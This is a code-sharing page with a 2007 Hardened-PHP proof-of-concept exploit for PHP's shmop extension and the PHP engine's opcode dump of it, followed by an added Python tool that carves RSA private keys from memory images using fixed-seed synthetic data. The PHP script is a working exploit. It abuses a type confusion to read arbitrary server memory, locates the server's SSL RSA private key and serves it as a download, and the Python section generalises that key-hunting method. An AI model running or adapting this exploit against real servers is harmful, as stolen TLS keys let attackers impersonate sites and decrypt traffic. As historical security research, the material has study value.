3v4l.org

<?php
////////////////////////////////////////////////////////////////////////
//  _  _              _                    _     ___  _  _  ___       //
// | || | __ _  _ _ __| | ___  _ _  ___  __| |   | _ \| || || _ \      //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/      //
// |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|      //
//                                                                    //
//        Proof of concept code from the Hardened-PHP Project         //
//                   (C) Copyright 2007 Stefan Esser                  //
//                                                                    //
////////////////////////////////////////////////////////////////////////
//        PHP ext/shmop SSL RSA Private-Key Disclosure Exploit        //
////////////////////////////////////////////////////////////////////////

// This is meant as a protection against remote file inclusion.

if (!extension_loaded("gd") || !extension_loaded("shmop")) {
    die("This demonstration exploit only works with ext/gd and ext/shmop loaded.");
}
// init(): create a palette image with two colour entries (indices 0 and 1) that peek() will rewrite.
function init()
{
    global $rid;

    $rid = imagecreate(10,10);
    imagecolorallocate($rid, 0, 0, 0);
    imagecolorallocate($rid, 0, 0, 0);
}
// peek(): arbitrary memory read. shmop_read() in 2007-era PHP did not verify the resource type it was handed, so the gd image is treated as a php_shmop struct whose addr and size fields overlap palette entries 0 and 1.
function peek($addr, $size)
{
    global $rid;
    imagecolordeallocate($rid, 0);
    imagecolordeallocate($rid, 1);
    imagecolorallocate($rid, $addr, 0, 0);   // palette entry 0 = address to read from
    imagecolorallocate($rid, $size, 0, 0);   // palette entry 1 = number of bytes to read
    return shmop_read((int)$rid, 0, $size);  // gd resource id passed where a shmop id is expected
}

init();
// Start 64 KiB above 0x08048000, the load address of a non-PIE 32-bit Linux ELF binary (0x08058000).
$offset = 0x08048000 + 1024 * 64;
// Walk memory in 1 KiB steps until a candidate key passes all three checks below.
while (1) {
    // Read 16 bytes beyond the step so a header that starts near the end of the window is still complete.
    $data = peek($offset, 1024 + 16);
    // 0x30 0x82 = DER SEQUENCE with a two-byte length, the first bytes of a PKCS#1 RSAPrivateKey of 1024 bits or more.
    $position = strpos($data, "\x30\x82");
    if ($position !== false && $position < 1024) {
        // Potential Key: 0x02 0x01 0x00 is INTEGER version 0, the following 0x02 is the modulus INTEGER tag
        if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") {
            $length = ord($data[$position+2])*256+ord($data[$position+3])+4;   // DER body length + 4 header bytes
            $keydata = peek($offset + $position, $length);
            // Assume an exponent of 0x10001 to really find a RSA key and not a DSA one
            if (strpos($keydata, "\x01\x00\x01") > 0)   // loose check: 65537 big-endian somewhere after the header
                break;
        }
    }
    $offset += 1024;
}
// Hand the carved DER blob back to the client as a download.
header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"server.der\"");
echo $keydata;
?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 47) Position 1 = 5, Position 2 = 10
Branch analysis from position: 5
2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 12
Branch analysis from position: 11
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 12
1 jumps found. (Code = 42) Position 1 = 67
Branch analysis from position: 67
2 jumps found. (Code = 44) Position 1 = 68, Position 2 = 16
Branch analysis from position: 68
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 16
2 jumps found. (Code = 46) Position 1 = 28, Position 2 = 30
Branch analysis from position: 28
2 jumps found. (Code = 43) Position 1 = 31, Position 2 = 66
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 66
Branch analysis from position: 39
2 jumps found. (Code = 43) Position 1 = 65, Position 2 = 66
Branch analysis from position: 65
1 jumps found. (Code = 42) Position 1 = 68
Branch analysis from position: 68
Branch analysis from position: 66
2 jumps found. (Code = 44) Position 1 = 68, Position 2 = 16
Branch analysis from position: 68
Branch analysis from position: 16
Branch analysis from position: 66
Branch analysis from position: 66
Branch analysis from position: 30
Branch analysis from position: 10
filename:       /in/DTl4j
function name:  (null)
number of ops:  76
compiled vars:  !0 = $offset, !1 = $data, !2 = $position, !3 = $length, !4 = $keydata
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   17     0  E >   INIT_FCALL                                               'extension_loaded'
          1        SEND_VAL                                                 'gd'
          2        DO_ICALL                                         $5      
          3        BOOL_NOT                                         ~6      $5
          4      > JMPNZ_EX                                         ~6      ~6, ->10
          5    >   INIT_FCALL                                               'extension_loaded'
          6        SEND_VAL                                                 'shmop'
          7        DO_ICALL                                         $7      
          8        BOOL_NOT                                         ~8      $7
          9        BOOL                                             ~6      ~8
         10    > > JMPZ                                                     ~6, ->12
   18    11    > > EXIT                                                     'This+demonstration+exploit+only+works+with+ext%2Fgd+and+ext%2Fshmop+loaded.'
   40    12    >   INIT_FCALL                                               'init'
         13        DO_FCALL                                      0          
   42    14        ASSIGN                                                   !0, 134578176
   44    15      > JMP                                                      ->67
   46    16    >   INIT_FCALL                                               'peek'
         17        SEND_VAR                                                 !0
         18        SEND_VAL                                                 1040
         19        DO_FCALL                                      0  $11     
         20        ASSIGN                                                   !1, $11
   48    21        INIT_FCALL                                               'strpos'
         22        SEND_VAR                                                 !1
         23        SEND_VAL                                                 '0%82'
         24        DO_ICALL                                         $13     
         25        ASSIGN                                                   !2, $13
   49    26        TYPE_CHECK                                  1018  ~15     !2
         27      > JMPZ_EX                                          ~15     ~15, ->30
         28    >   IS_SMALLER                                       ~16     !2, 1024
         29        BOOL                                             ~15     ~16
         30    > > JMPZ                                                     ~15, ->66
   51    31    >   INIT_FCALL                                               'substr'
         32        SEND_VAR                                                 !1
         33        ADD                                              ~17     !2, 4
         34        SEND_VAL                                                 ~17
         35        SEND_VAL                                                 4
         36        DO_ICALL                                         $18     
         37        IS_EQUAL                                                 $18, '%02%01%00%02'
         38      > JMPZ                                                     ~19, ->66
   52    39    >   INIT_FCALL                                               'ord'
         40        ADD                                              ~20     !2, 2
         41        FETCH_DIM_R                                      ~21     !1, ~20
         42        SEND_VAL                                                 ~21
         43        DO_ICALL                                         $22     
         44        MUL                                              ~23     $22, 256
         45        INIT_FCALL                                               'ord'
         46        ADD                                              ~24     !2, 3
         47        FETCH_DIM_R                                      ~25     !1, ~24
         48        SEND_VAL                                                 ~25
         49        DO_ICALL                                         $26     
         50        ADD                                              ~27     ~23, $26
         51        ADD                                              ~28     ~27, 4
         52        ASSIGN                                                   !3, ~28
   53    53        INIT_FCALL                                               'peek'
         54        ADD                                              ~30     !0, !2
         55        SEND_VAL                                                 ~30
         56        SEND_VAR                                                 !3
         57        DO_FCALL                                      0  $31     
         58        ASSIGN                                                   !4, $31
   55    59        INIT_FCALL                                               'strpos'
         60        SEND_VAR                                                 !4
         61        SEND_VAL                                                 '%01%00%01'
         62        DO_ICALL                                         $33     
         63        IS_SMALLER                                               0, $33
         64      > JMPZ                                                     ~34, ->66
   56    65    > > JMP                                                      ->68
   59    66    >   ASSIGN_OP                                     1          !0, 1024
   44    67    > > JMPNZ                                                    1, ->16
   62    68    >   INIT_FCALL                                               'header'
         69        SEND_VAL                                                 'Content-type%3A+application%2Foctet-stream'
         70        DO_ICALL                                                 
   63    71        INIT_FCALL                                               'header'
         72        SEND_VAL                                                 'Content-Disposition%3A+attachment%3B+filename%3D%22server.der%22'
         73        DO_ICALL                                                 
   64    74        ECHO                                                     !4
   65    75      > RETURN                                                   1

Function init:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/DTl4j
function name:  init
number of ops:  19
compiled vars:  !0 = $rid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   23     0  E >   BIND_GLOBAL                                              !0, 'rid'
   25     1        INIT_FCALL_BY_NAME                                       'imagecreate'
          2        SEND_VAL_EX                                              10
          3        SEND_VAL_EX                                              10
          4        DO_FCALL                                      0  $1      
          5        ASSIGN                                                   !0, $1
   26     6        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
          7        SEND_VAR_EX                                              !0
          8        SEND_VAL_EX                                              0
          9        SEND_VAL_EX                                              0
         10        SEND_VAL_EX                                              0
         11        DO_FCALL                                      0          
   27    12        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         13        SEND_VAR_EX                                              !0
         14        SEND_VAL_EX                                              0
         15        SEND_VAL_EX                                              0
         16        SEND_VAL_EX                                              0
         17        DO_FCALL                                      0          
   28    18      > RETURN                                                   null

End of function init

Function peek:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/DTl4j
function name:  peek
number of ops:  31
compiled vars:  !0 = $addr, !1 = $size, !2 = $rid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   30     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   32     2        BIND_GLOBAL                                              !2, 'rid'
   33     3        INIT_FCALL_BY_NAME                                       'imagecolordeallocate'
          4        SEND_VAR_EX                                              !2
          5        SEND_VAL_EX                                              0
          6        DO_FCALL                                      0          
   34     7        INIT_FCALL_BY_NAME                                       'imagecolordeallocate'
          8        SEND_VAR_EX                                              !2
          9        SEND_VAL_EX                                              1
         10        DO_FCALL                                      0          
   35    11        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         12        SEND_VAR_EX                                              !2
         13        SEND_VAR_EX                                              !0
         14        SEND_VAL_EX                                              0
         15        SEND_VAL_EX                                              0
         16        DO_FCALL                                      0          
   36    17        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         18        SEND_VAR_EX                                              !2
         19        SEND_VAR_EX                                              !1
         20        SEND_VAL_EX                                              0
         21        SEND_VAL_EX                                              0
         22        DO_FCALL                                      0          
   37    23        INIT_FCALL_BY_NAME                                       'shmop_read'
         24        CAST                                          4  ~7      !2
         25        SEND_VAL_EX                                              ~7
         26        SEND_VAL_EX                                              0
         27        SEND_VAR_EX                                              !1
         28        DO_FCALL                                      0  $8      
         29      > RETURN                                                   $8
   38    30*     > RETURN                                                   null

End of function peek

Generated using Vulcan Logic Dumper, using php 8.0.0
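The search heuristic of the PoC script above (a SEQUENCE starting 30 82, INTEGER version 0, the modulus INTEGER, a public exponent of 65537, and 1024-byte steps read with 16 bytes of overlap), reworked as an offline carver over a memory image such as a core dump. This is an added example, not code from the 3v4l page or from the Hardened-PHP PoC; it is written in Python rather than PHP, every function name in it is its own, and the memory image, the synthetic RSAPrivateKey and the DSA-shaped decoy are constructed inline from fixed-seed random numbers (the key is not a valid RSA key pair). It goes beyond the PoC in two ways: it decodes DER lengths in general rather than assuming the 0x82 form, and it parses the version, modulus and exponent fields instead of grepping for 01 00 01.

```python
"""Offline carver for PKCS#1 RSAPrivateKey DER blobs in a memory image.

Added example, not part of the 3v4l page or the Hardened-PHP PoC. All inputs
below are constructed with a fixed-seed PRNG; the "key" is not a real key pair.
"""
import random


def der_length(buf, pos):
    """Decode a DER length starting at buf[pos]; return (length, header_size) or None."""
    if pos >= len(buf):
        return None
    first = buf[pos]
    if first < 0x80:
        return first, 1
    n = first & 0x7F
    if n == 0 or n > 4 or pos + 1 + n > len(buf):      # indefinite or absurd length: not DER
        return None
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), 1 + n


def der_encode_length(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_integer(value):
    """DER INTEGER for a non-negative int (leading 0x00 added when the high bit is set)."""
    body = value.to_bytes((value.bit_length() + 8) // 8, "big")
    return b"\x02" + der_encode_length(len(body)) + body


def der_sequence(*items):
    body = b"".join(items)
    return b"\x30" + der_encode_length(len(body)) + body


def parse_rsa_private_key(buf, pos):
    """If an RSAPrivateKey SEQUENCE starts at buf[pos], return (total_len, n, e), else None.

    Only the first three fields are decoded: version INTEGER 0, modulus n, public exponent e.
    """
    if buf[pos:pos + 1] != b"\x30":
        return None
    got = der_length(buf, pos + 1)
    if got is None:
        return None
    seq_len, hdr = got
    total = 1 + hdr + seq_len
    if total > len(buf) - pos:
        return None
    p = pos + 1 + hdr
    if buf[p:p + 3] != b"\x02\x01\x00":                 # version INTEGER 0 (two-prime RSA)
        return None
    p += 3
    values = []
    for _ in range(2):                                  # modulus n, then public exponent e
        if buf[p:p + 1] != b"\x02":
            return None
        got = der_length(buf, p + 1)
        if got is None:
            return None
        ilen, ihdr = got
        start = p + 1 + ihdr
        if ilen == 0 or start + ilen > pos + total:
            return None
        values.append(int.from_bytes(buf[start:start + ilen], "big"))
        p = start + ilen
    return total, values[0], values[1]


def carve_rsa_keys(buf, exponent=65537):
    """Scan a whole buffer; return [(offset, der_bytes)] for each RSAPrivateKey whose e == exponent.

    exponent=None accepts any e, which also lets DSA-shaped blobs (version 0, p, q, ...) through:
    the false positive the PoC's exponent check exists to reject.
    """
    found = []
    pos = buf.find(b"\x30")
    while pos != -1:
        parsed = parse_rsa_private_key(buf, pos)
        if parsed and (exponent is None or parsed[2] == exponent):
            found.append((pos, buf[pos:pos + parsed[0]]))
            pos = buf.find(b"\x30", pos + parsed[0])
        else:
            pos = buf.find(b"\x30", pos + 1)
    return found


def carve_windowed(peek, start, end, step=1024, overlap=16):
    """The PoC's stepping scan over a peek(addr, size) -> bytes primitive.

    Each window is step+overlap bytes, so a '30 82 ll ll 02 01 00 02' header whose first byte sits
    in the last bytes of a step is still fully visible; the candidate is then re-read at its real
    length and verified by parse_rsa_private_key instead of a loose search for 01 00 01.
    """
    addr = start
    while addr < end:
        chunk = peek(addr, step + overlap)
        hit = chunk.find(b"\x30\x82")
        while hit != -1 and hit < step:
            if chunk[hit + 4:hit + 8] == b"\x02\x01\x00\x02":
                length = ((chunk[hit + 2] << 8) | chunk[hit + 3]) + 4
                key = peek(addr + hit, length)
                parsed = parse_rsa_private_key(key, 0)
                if parsed and parsed[2] == 65537:
                    return addr + hit, key
            hit = chunk.find(b"\x30\x82", hit + 1)
        addr += step
    return None


def build_sample_image(seed=1):
    """Constructed memory image: noise, a DSA-shaped decoy at offset 500, and a synthetic
    RSAPrivateKey whose 30 82 header straddles the 1024-byte step boundary at 3072."""
    rng = random.Random(seed)

    def noise(n):
        return bytes(rng.getrandbits(8) for _ in range(n))

    def big(bits):                                      # stand-in for a bits-long DER INTEGER
        return (1 << (bits - 1)) | rng.getrandbits(bits - 1)

    # RSAPrivateKey field order: version, n, e, d, p, q, dp, dq, qInv (random stand-ins, not a key pair)
    key = der_sequence(der_integer(0), der_integer(big(1024)), der_integer(65537),
                       *[der_integer(big(b)) for b in (1024, 512, 512, 512, 512, 512)])
    # DSAPrivateKey field order: version, p, q, g, y, x; its first eight bytes look exactly like an RSA key
    decoy = der_sequence(der_integer(0), *[der_integer(big(b)) for b in (1024, 160, 1024, 1024, 160)])
    decoy_off, key_off = 500, 3 * 1024 - 2
    image = noise(decoy_off) + decoy
    image += noise(key_off - len(image)) + key + noise(700)
    return image, key_off, key, decoy_off


if __name__ == "__main__":
    image, key_off, key, decoy_off = build_sample_image()
    print("whole-buffer scan:", [(off, len(blob)) for off, blob in carve_rsa_keys(image)])
    print("any exponent:    ", [off for off, _ in carve_rsa_keys(image, exponent=None)])
    hit = carve_windowed(lambda a, s: image[a:a + s], 0, len(image))
    print("PoC-style scan:  ", hit[0], len(hit[1]))
```

`carve_rsa_keys` is what you would run over a saved image; `carve_windowed` reproduces the PoC's read pattern against any `peek(addr, size)` primitive and makes the overlap requirement concrete, since the sample key's header begins two bytes before a step boundary and only the 16 extra bytes let the version check succeed in that window. The decoy is the case the PoC's comment about DSA keys refers to: it survives both byte-pattern checks and is rejected only by the exponent test.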

